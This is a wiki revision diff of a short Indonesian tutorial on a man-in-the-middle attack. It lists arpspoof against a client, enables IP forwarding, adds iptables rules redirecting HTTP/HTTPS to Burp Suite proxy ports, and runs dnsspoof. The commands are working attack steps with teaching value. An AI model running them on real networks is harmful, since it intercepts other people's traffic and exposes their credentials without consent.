Difference between revisions of "MITM: burpsuite"
Jump to navigation
Jump to search
Onnowpurbo (talk | contribs) |
Onnowpurbo (talk | contribs) |
||
(4 intermediate revisions by the same user not shown) | |||
Line 1: | Line 1: | ||
==arpspoof== | ==arpspoof== | ||
+ | |||
+ | Lakukan arpspoof ke client saja .. | ||
arpspoof -i <interface> -t <target> <router> | arpspoof -i <interface> -t <target> <router> | ||
+ | |||
+ | ==Redirect & IP Forwarding== | ||
echo 1 > /proc/sys/net/ipv4/ip_forward | echo 1 > /proc/sys/net/ipv4/ip_forward | ||
sysctl -w net.ipv4.ip_forward=1 | sysctl -w net.ipv4.ip_forward=1 | ||
+ | |||
+ | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 | ||
+ | iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8443 | ||
+ | |||
+ | |||
+ | iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 80 -j REDIRECT --to-port 8080 | ||
+ | iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 443 -j REDIRECT --to-port 8443 | ||
+ | |||
+ | |||
+ | |||
dnsspoof -i <interface> | dnsspoof -i <interface> | ||
Line 16: | Line 30: | ||
* klik Proxy > Intercept > Intercept is on | * klik Proxy > Intercept > Intercept is on | ||
− | + | Kita perlu mengarahkan | |
− | Kita perlu mengarahkan traffic | + | |
+ | * traffic 80 ke port 8080 + enable invisible proxy | ||
+ | * traffic 443 ke port 8443 + enable invisible proxy | ||
==Pranala Menarik== | ==Pranala Menarik== | ||
* [[MITM]] | * [[MITM]] |
Latest revision as of 04:47, 6 October 2018
arpspoof
Lakukan arpspoof ke client saja ..
arpspoof -i <interface> -t <target> <router>
Redirect & IP Forwarding
echo 1 > /proc/sys/net/ipv4/ip_forward sysctl -w net.ipv4.ip_forward=1
iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -i eth0 -p tcp --dport 443 -j REDIRECT --to-port 8443
iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 80 -j REDIRECT --to-port 8080 iptables -t nat -A PREROUTING -i eth0 -p tcp -s ip.cli.ent --dport 443 -j REDIRECT --to-port 8443
dnsspoof -i <interface>
Burpsuite
burpsuite
Setup
- klik Proxy > Intercept > Intercept is on
Kita perlu mengarahkan
- traffic 80 ke port 8080 + enable invisible proxy
- traffic 443 ke port 8443 + enable invisible proxy